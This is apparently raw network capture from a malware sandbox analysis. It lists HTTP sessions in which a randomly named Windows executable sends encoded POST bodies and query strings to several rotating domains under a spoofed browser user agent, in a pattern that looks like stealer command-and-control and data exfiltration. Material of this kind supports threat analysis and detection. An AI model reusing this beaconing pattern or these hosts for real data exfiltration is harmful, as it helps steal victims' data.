                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.orthonow.live
                                                            Referer: http://www.orthonow.live/c7lp/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Jul 3, 2024 17:35:48.180605888 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                            date: Wed, 03 Jul 2024 15:35:47 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1118
                                                            x-request-id: a9bead28-745e-4f05-bb8e-578d10eb3aeb
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==
                                                            set-cookie: parking_session=a9bead28-745e-4f05-bb8e-578d10eb3aeb; expires=Wed, 03 Jul 2024 15:50:48 GMT; path=/
                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.11.20 | 49784 | 199.59.243.226 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:35:50.712764978 CEST | 1289 | OUT | POST /c7lp/ HTTP/1.1
                                                            Host: www.orthonow.live
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.orthonow.live
                                                            Referer: http://www.orthonow.live/c7lp/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Jul 3, 2024 17:35:51.092320919 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                            date: Wed, 03 Jul 2024 15:35:50 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1118
                                                            x-request-id: ed1a68e7-3697-4277-ab11-ec9894f2b978
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==
                                                            set-cookie: parking_session=ed1a68e7-3697-4277-ab11-ec9894f2b978; expires=Wed, 03 Jul 2024 15:50:51 GMT; path=/
                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.11.20 | 49785 | 199.59.243.226 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:35:53.379725933 CEST | 521 | OUT | GET /c7lp/?vX=AZtUjmxX1+ilQa3cAX9z1397/CoXyobuelvuG0qO50IIYxbQIoa2zaoIA52olqXa0ysfLjRam7UGaI/Eozxq/aJIiPqlVVE06lZEm1LC+u5u0D0LnPSZBcs=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.orthonow.live
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Jul 3, 2024 17:35:53.523156881 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                            date: Wed, 03 Jul 2024 15:35:53 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1466
                                                            x-request-id: 87754135-223a-4427-b9c2-49bf14975299
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GBCzeUnU5TO+MREERbxCb4copKTT2ACdMEZ0YR6PCQKM4hwE0OK+fQkd1IqsiheKv0gcsYkqHA1LzQsE0kCJQQ==
                                                            set-cookie: parking_session=87754135-223a-4427-b9c2-49bf14975299; expires=Wed, 03 Jul 2024 15:50:53 GMT; path=/
                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.11.20 | 49787 | 3.33.130.190 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:37:31.398546934 CEST | 800 | OUT | POST /3c1k/ HTTP/1.1
                                                            Host: www.musiccitysauce.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.musiccitysauce.com
                                                            Referer: http://www.musiccitysauce.com/3c1k/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.11.20 | 49788 | 3.33.130.190 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:37:34.078990936 CEST | 1140 | OUT | POST /3c1k/ HTTP/1.1
                                                            Host: www.musiccitysauce.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.musiccitysauce.com
                                                            Referer: http://www.musiccitysauce.com/3c1k/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.11.20 | 49789 | 3.33.130.190 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:37:36.751774073 CEST | 6445 | OUT | POST /3c1k/ HTTP/1.1
                                                            Host: www.musiccitysauce.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.musiccitysauce.com
                                                            Referer: http://www.musiccitysauce.com/3c1k/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            16 | 192.168.11.20 | 49790 | 3.33.130.190 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:37:39.419517040 CEST | 526 | OUT | GET /3c1k/?vX=JBvkiC5/p5M0KduSv9nMAq1L7Ov9kIxy2ulrSw8DAMQ+oYrb/Oqt+Mz9qyL7kOgxOchk71vbEF/036GwyUgS8aFzNiZYrtFOzFZSCs3+FXjpDA1Q93DrzfE=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.musiccitysauce.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:37:39.561814070 CEST | 397 | IN | HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Wed, 03 Jul 2024 15:37:39 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vX=JBvkiC5/p5M0KduSv9nMAq1L7Ov9kIxy2ulrSw8DAMQ+oYrb/Oqt+Mz9qyL7kOgxOchk71vbEF/036GwyUgS8aFzNiZYrtFOzFZSCs3+FXjpDA1Q93DrzfE=&_B7=LxyxWrj8kri0gh"}</script></head></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            17 | 192.168.11.20 | 49791 | 66.235.200.145 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:37:44.983409882 CEST | 806 | OUT | POST /bjbg/ HTTP/1.1
                                                            Host: www.lakemontbellevue.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.lakemontbellevue.com
                                                            Referer: http://www.lakemontbellevue.com/bjbg/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:37:45.422059059 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:37:45 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://lakemontbellevue.net/wp-json/>; rel="https://api.w.org/"
                                                            Vary: Accept-Encoding
                                                            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                            X-Newfold-Cache-Level: 2
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            CF-Cache-Status: DYNAMIC
                                                            Set-Cookie: _cfuvid=J8TlPgwK.uyiwfHuPH9woqnGDB4R0kvbtowxQTqFaig-1720021065357-0.0.1.1-604800000; path=/; domain=.www.lakemontbellevue.com; HttpOnly
                                                            Server: cloudflare
                                                            CF-RAY: 89d7f5687c802ca3-ORD
                                                            Content-Encoding: gzip


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            18 | 192.168.11.20 | 49792 | 66.235.200.145 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:37:47.657325983 CEST | 1146 | OUT | POST /bjbg/ HTTP/1.1
                                                            Host: www.lakemontbellevue.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.lakemontbellevue.com
                                                            Referer: http://www.lakemontbellevue.com/bjbg/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:37:48.003277063 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:37:47 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://lakemontbellevue.net/wp-json/>; rel="https://api.w.org/"
                                                            Vary: Accept-Encoding
                                                            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                            X-Newfold-Cache-Level: 2
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            CF-Cache-Status: DYNAMIC
                                                            Set-Cookie: _cfuvid=q78Vdp1Tqcep1iwnGWiwInnpBJxldweYeAbg4IJrKkQ-1720021067938-0.0.1.1-604800000; path=/; domain=.www.lakemontbellevue.com; HttpOnly
                                                            Server: cloudflare
                                                            CF-RAY: 89d7f5793b9861c2-ORD
                                                            Content-Encoding: gzip


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            19 | 192.168.11.20 | 49793 | 66.235.200.145 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:37:50.326550961 CEST | 2578 | OUT | POST /bjbg/ HTTP/1.1
                                                            Host: www.lakemontbellevue.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.lakemontbellevue.com
                                                            Referer: http://www.lakemontbellevue.com/bjbg/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:37:51.024049044 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:37:50 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://lakemontbellevue.net/wp-json/>; rel="https://api.w.org/"
                                                            Vary: Accept-Encoding
                                                            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                            X-Newfold-Cache-Level: 2
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            CF-Cache-Status: DYNAMIC
                                                            Set-Cookie: _cfuvid=QM.78s0mfIAeC4YRoX5T.1X2oVj_9R4U_FraGL8j2lY-1720021070959-0.0.1.1-604800000; path=/; domain=.www.lakemontbellevue.com; HttpOnly
                                                            Server: cloudflare
                                                            CF-RAY: 89d7f589eaa62d25-ORD
                                                            Content-Encoding: gzip


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            20 | 192.168.11.20 | 49794 | 66.235.200.145 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:37:52.995919943 CEST | 528 | OUT | GET /bjbg/?_B7=LxyxWrj8kri0gh&vX=PaEFrgJgmJNh1u/DWUxMIeDskG5qzMhDGrQ71u93fIH85Lzxsg5t1cmIlpAxPUwLJ58UUf9JzsDSaHkwZqJSKveW5uukdz+QiIy0PILQ7uEd2NrIiK6nDiA= HTTP/1.1
                                                            Host: www.lakemontbellevue.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:37:53.376271963 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:37:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://lakemontbellevue.net/wp-json/>; rel="https://api.w.org/"
                                                            Vary: Accept-Encoding
                                                            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                            X-Newfold-Cache-Level: 2
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            CF-Cache-Status: MISS
                                                            Set-Cookie: _cfuvid=GdR6J7M7UyeLSOen6FI8vvmIKiL9UZKbqu7AICoDdbc-1720021073312-0.0.1.1-604800000; path=/; domain=.www.lakemontbellevue.com; HttpOnly
                                                            Server: cloudflare
                                                            CF-RAY: 89d7f59a9da42cf5-ORD


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            21 | 192.168.11.20 | 49795 | 103.120.176.124 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:37:58.967653990 CEST | 791 | OUT | POST /n8dl/ HTTP/1.1
                                                            Host: www.vintagewins.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.vintagewins.com
                                                            Referer: http://www.vintagewins.com/n8dl/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:37:59.900204897 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            content-type: text/html; charset=UTF-8
                                                            link: <https://vintagewins.com/wp-json/>; rel="https://api.w.org/"
                                                            transfer-encoding: chunked
                                                            content-encoding: br
                                                            vary: Accept-Encoding
                                                            date: Wed, 03 Jul 2024 15:37:59 GMT
                                                            server: LiteSpeed
                                                            Data Ascii: 4e7@K}RJ+6v-hB*igw}VM15tl^A;]28V*;NT!+w CU!FlPV.1d}F(^sP}E+T;%PX~:4sWLIMREkLZ"#A-9k/;Ng
                                                            Jul 3, 2024 17:37:59.969681025 CEST5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            22 | 192.168.11.20 | 49796 | 103.120.176.124 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:01.880491972 CEST | 1131 | OUT | POST /n8dl/ HTTP/1.1
                                                            Host: www.vintagewins.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.vintagewins.com
                                                            Referer: http://www.vintagewins.com/n8dl/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:38:02.954888105 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            content-type: text/html; charset=UTF-8
                                                            link: <https://vintagewins.com/wp-json/>; rel="https://api.w.org/"
                                                            transfer-encoding: chunked
                                                            content-encoding: br
                                                            vary: Accept-Encoding
                                                            date: Wed, 03 Jul 2024 15:38:02 GMT
                                                            server: LiteSpeed


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            23 | 192.168.11.20 | 49797 | 103.120.176.124 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:04.789894104 CEST | 2578 | OUT | POST /n8dl/ HTTP/1.1
                                                            Host: www.vintagewins.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.vintagewins.com
                                                            Referer: http://www.vintagewins.com/n8dl/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:38:06.407634020 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            content-type: text/html; charset=UTF-8
                                                            link: <https://vintagewins.com/wp-json/>; rel="https://api.w.org/"
                                                            transfer-encoding: chunked
                                                            content-encoding: br
                                                            vary: Accept-Encoding
                                                            date: Wed, 03 Jul 2024 15:38:06 GMT
                                                            server: LiteSpeed


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            24 | 192.168.11.20 | 49798 | 103.120.176.124 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:07.702914000 CEST | 523 | OUT | GET /n8dl/?vX=FC28+8TNt1EBJ9Rr13Lf8bY2TrPAAO0Ms+TIyItlK84e+VLAwR127cfT6eGfINY83g5c74t6Ntc+Rr+iqurKq/8v/YzcG8LG32bad+3/XATcsm3Xq6o13Rk=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.vintagewins.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:38:08.600579023 CEST | 470 | IN | HTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            content-type: text/html; charset=UTF-8
                                                            x-redirect-by: WordPress
                                                            location: http://vintagewins.com/n8dl/?vX=FC28+8TNt1EBJ9Rr13Lf8bY2TrPAAO0Ms+TIyItlK84e+VLAwR127cfT6eGfINY83g5c74t6Ntc+Rr+iqurKq/8v/YzcG8LG32bad+3/XATcsm3Xq6o13Rk=&_B7=LxyxWrj8kri0gh
                                                            content-length: 0
                                                            date: Wed, 03 Jul 2024 15:38:08 GMT
                                                            server: LiteSpeed


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            25 | 192.168.11.20 | 49799 | 203.161.50.127 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:38:14.032248974 CEST | 779 | OUT | POST /pci0/ HTTP/1.1
                                                            Host: www.spotluv.xyz
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.spotluv.xyz
                                                            Referer: http://www.spotluv.xyz/pci0/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Ascii: vX=TQpyyhykb0+1rphICmxR99maWTX0Hl5hEOpByBMo2yb/z1ocwNi3FNsQrTb1BTZAn+Ckp0IGtF+yzi5Tf/lguRR0PDhHpSvD+aS7cck7c3821P4fi3CTw7nGudgpXv/5e9YdjEHyJ7bCnXSsHBTZP8nDBZyJ75HJX0h/mfiML11GV2btaMOHIufXQAvNiDhMaw==
                                                            Jul 3, 2024 17:38:14.226490974 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:38:14 GMT
                                                            Server: Apache
                                                            Content-Length: 16052
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Jul 3, 2024 17:38:14.226728916 CEST1289INData Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
